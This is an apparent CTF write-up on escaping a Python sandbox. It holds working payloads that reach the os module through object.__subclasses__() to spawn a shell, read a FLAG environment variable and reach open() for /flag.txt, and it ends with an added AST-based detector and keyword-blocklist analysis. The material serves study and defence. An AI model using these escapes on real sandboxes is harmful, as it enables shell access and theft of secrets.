29 lines
1.3 KiB
Plaintext
The Python sandbox blocks import, etc.

From here: https://github.com/jailctf/pyjailbreaker
https://github.com/yaklang/hack-skills/blob/main/skills/sandbox-escape-techniques/PYTHON_SANDBOX_ESCAPE.md

An expression like this one reaches the os module through object.__subclasses__() and calls system:
[cls for cls in object.__subclasses__() if 'os._wrap_close' in str(cls)][0].__init__.__globals__['sys'].modules['os'].system('sh')

The sandbox still bans keywords such as system, so:
def fibonacci(n):
    # Your implementation here
    # Locate os._wrap_close among object's subclasses, then reach the os module via its __init__ globals
    os_mod = [cls for cls in object.__subclasses__() if 'os._wrap_close' in str(cls)][0].__init__.__globals__['sys'].modules['os']
    print(os_mod.getenv('FLAG'))

I tried and found out that the FLAG is also set as an environment variable, and so I got it using os.getenv('FLAG').

WORK IN PROGRESS
def fibonacci(n):
    # Your implementation here
    #for i, cls in enumerate(''.__class__.__bases__[0].__subclasses__()):
    #    if 'codecs.In' in str(cls):
    #        print(i, cls)
    #        break
    # Index printed by the loop above; it differs between Python builds
    INDEX=127
    dictglobals = ().__class__.__bases__[0].__subclasses__()[INDEX].__init__.__globals__
    print(dictglobals.keys())
    op_en = ().__class__.__bases__[0].__subclasses__()[INDEX].__init__.__globals__['open']
    #('/flag.txt','r')
    #re_ad = ().__class__.__bases__[0].__subclasses__()[INDEX].__init__.__globals__['read']
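
Added example (not part of the original notes, and not code from the linked repositories): why a keyword blocklist lets the getenv submission through, next to an AST check that flags the attribute walk. It assumes the sandbox filter is a substring blocklist of "import" and "system"; the function names and the attribute set are hypothetical.

```python
import ast

# Assumed model of the sandbox's filter: reject on banned substrings only.
BANNED_KEYWORDS = ("import", "system")

# Attributes used to walk from a literal or type to module globals.
INTROSPECTION_ATTRS = {
    "__subclasses__", "__globals__", "__bases__",
    "__class__", "__mro__", "__builtins__",
}

def keyword_filter_allows(source: str) -> bool:
    """Naive check: allow the submission unless a banned substring appears."""
    return not any(word in source for word in BANNED_KEYWORDS)

def introspection_findings(source: str) -> list[tuple[int, str]]:
    """Return sorted (line, name) pairs for each introspection dunder used."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Attribute) and node.attr in INTROSPECTION_ATTRS:
            findings.add((node.lineno, node.attr))
        elif isinstance(node, ast.Name) and node.id in INTROSPECTION_ATTRS:
            findings.add((node.lineno, node.id))
    return sorted(findings)

# The submission from the notes above, reproduced as sample input.
SUBMISSION = '''\
def fibonacci(n):
    os_mod = [cls for cls in object.__subclasses__() if 'os._wrap_close' in str(cls)][0].__init__.__globals__['sys'].modules['os']
    print(os_mod.getenv('FLAG'))
'''

# Constructed benign submission that should pass both checks.
BENIGN = '''\
def fibonacci(n):
    a, b = 0, 1
    for _ in range(n):
        a, b = b, a + b
    return a
'''

if __name__ == "__main__":
    for name, src in (("submission", SUBMISSION), ("benign", BENIGN)):
        print(name, keyword_filter_allows(src), introspection_findings(src))
```

The AST check is a reject-early filter, not an isolation boundary. Keeping secrets such as FLAG out of the environment of the process that runs submissions removes what this submission read.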